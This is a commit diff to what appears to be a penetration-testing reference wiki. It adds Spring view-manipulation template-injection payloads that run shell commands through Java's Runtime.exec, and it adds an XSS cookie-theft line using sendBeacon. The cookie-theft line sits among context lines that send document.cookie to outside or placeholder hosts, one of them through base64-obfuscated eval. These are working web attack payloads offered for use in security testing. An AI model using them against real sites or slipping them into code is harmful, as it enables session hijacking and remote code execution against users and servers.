GitBook: [master] 2 pages modified

pentesting-web/ssti-server-side-template-injection.md

@@ -151,6 +151,13 @@ http://localhost:8082/(${T(java.lang.Runtime).getRuntime().exec('calc')})
 
 * [https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/](https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/)
 
+### Spring View Manipulation \(Java\)
+
+* `__${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("id").getInputStream()).next()}__::.x`
+* `__${T(java.lang.Runtime).getRuntime().exec("touch executed")}__::.x`
+
+[https://github.com/veracode-research/spring-view-manipulation](https://github.com/veracode-research/spring-view-manipulation)
+
 ### Smarty \(PHP\)
 
 #### More information

pentesting-web/xss-cross-site-scripting/README.md

@@ -522,6 +522,7 @@ A XSS occurs.
 <script>var xhttp=new XMLHttpRequest();xhttp.open("GET", "http://<SERVER_IP>/?c="%2Bdocument.cookie, true);xhttp.send();</script>
 <script>eval(atob('ZG9jdW1lbnQud3JpdGUoIjxpbWcgc3JjPSdodHRwczovLzxTRVJWRVJfSVA+P2M9IisgZG9jdW1lbnQuY29va2llICsiJyAvPiIp'));</script>
 <script>fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net', {method: 'POST', mode: 'no-cors', body:document.cookie});</script>
+<script>navigator.sendBeacon('https://ssrftest.com/x/AAAAA',document.cookie)</script>
 ```
 
 ### Port Scanner \(fetch\)